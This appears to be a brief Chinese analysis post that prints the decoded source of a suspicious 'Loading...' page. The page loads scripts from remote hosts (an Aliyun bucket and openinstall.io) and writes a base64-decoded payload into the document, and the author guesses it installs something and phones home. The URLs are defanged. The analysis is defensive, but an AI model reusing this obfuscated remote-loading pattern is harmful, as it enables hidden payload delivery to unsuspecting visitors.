解析完后的代码
<html lang="zh-cn">
<head>
<meta charset="utf-8">
<title>Loading... Please wait...</title>
<script src="htt 屏蔽地址防止误点 ps://indexwealth.oss-acc 屏蔽地址防止误点
elerate.aliyuncs.com/update/global/md5.min.js"></script>
<script src="htt 屏蔽地址防止误点 ps://indexwealth.oss-accel 屏蔽地址防止误点
erate.aliyuncs.com/update/global/vue.cjs.min.js"></script>
<script type="text/javascript" src="ht 屏蔽地址防止误点 tps://web.cdn.openins 屏蔽地址防止误点
tall.io/openinstall.js"></script>
<script type="text/javascript" src="htt 屏蔽地址防止误点 ps://indexwealth.oss-accelerate.aliyu 屏蔽地址防止误点
ncs.com/update/index/1113/w84iap.js"></script>
</head>
<body>
<script>
function b64DecodeUnicode(str) {
return decodeURIComponent(atob(str).split('').map(function(c) {
return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);
}).join(''));
}
var base64Content = decodeAndOutputBase64();
var doc = document.open('text/html', 'replace');
var dat = b64DecodeUnicode(base64Content);
doc.write(dat);
doc.close();
</script>
</body>
</html>
通过查看 openinstall.js 的代码.
可能是安装了什么,最后还会向某个地址发了请求.具体得看这个 openinstall.js 的代码